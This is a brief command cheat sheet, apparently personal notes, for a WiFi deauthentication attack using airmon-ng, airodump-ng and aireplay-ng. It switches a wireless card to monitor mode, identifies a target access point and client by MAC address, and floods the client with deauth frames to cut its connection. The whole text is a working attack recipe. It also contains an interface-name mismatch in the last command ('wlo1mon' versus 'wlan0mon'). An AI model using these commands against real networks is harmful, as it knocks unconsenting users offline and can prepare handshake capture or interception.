## WiFi Deauthentication Attack

# 1. Put the WiFi interface into monitor mode
iwconfig # -> check the interface name
airmon-ng check kill
airmon-ng start wlan0
iwconfig # -> testing the mode of operation

# 2. Identify the network and the target
airodump-ng -i wlan0mon 
airodump-ng -i wlan0mon --bssid 34:2C:C4:93:45:97 -c 1 # -> narrow down the result

# 3. Launching the deauthentication attack
aireplay-ng --test wlan0mon # -> testing injection
aireplay-ng --deauth 999999 -a 34:2C:C4:93:45:97 -c b4:c4:fc:67:57:08 wlo1mon

# --deauth -> no. of deauth frames to send (0 means continuously)
# -a -> MAC address of the AP 
# -c -> MAC address of the client to deauthenticate